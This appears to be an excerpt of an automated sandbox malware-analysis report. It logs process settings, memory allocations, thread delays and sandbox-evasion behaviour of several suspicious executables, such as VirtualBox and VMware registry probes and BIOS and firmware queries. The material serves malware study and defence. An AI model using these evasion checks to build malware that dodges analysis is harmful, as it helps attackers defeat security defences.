                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Windows\System32\svchost.exeSection loaded: OutputDebugStringW count: 128
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                  Source: PZ3hKWPffUrXuh6Gjn77Ivv1.exe, 00000008.00000002.1742610833.000000000300E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeMemory allocated: 233C0730000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: F10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 28A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 6480000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 7480000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 7920000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 8920000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 8BD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 9BD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 78E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 9210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: A210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: B210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: C210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 78E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 6480000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 9210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599889Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599775Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599450Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599336Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598789Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598527Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598420Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597982Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596926Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596757Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596529Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596122Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595669Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595118Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595013Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 300000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594787Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594544Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594108Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593885Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593781Jump to behavior
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeThread delayed: delay time: 300000
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeThread delayed: delay time: 300000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
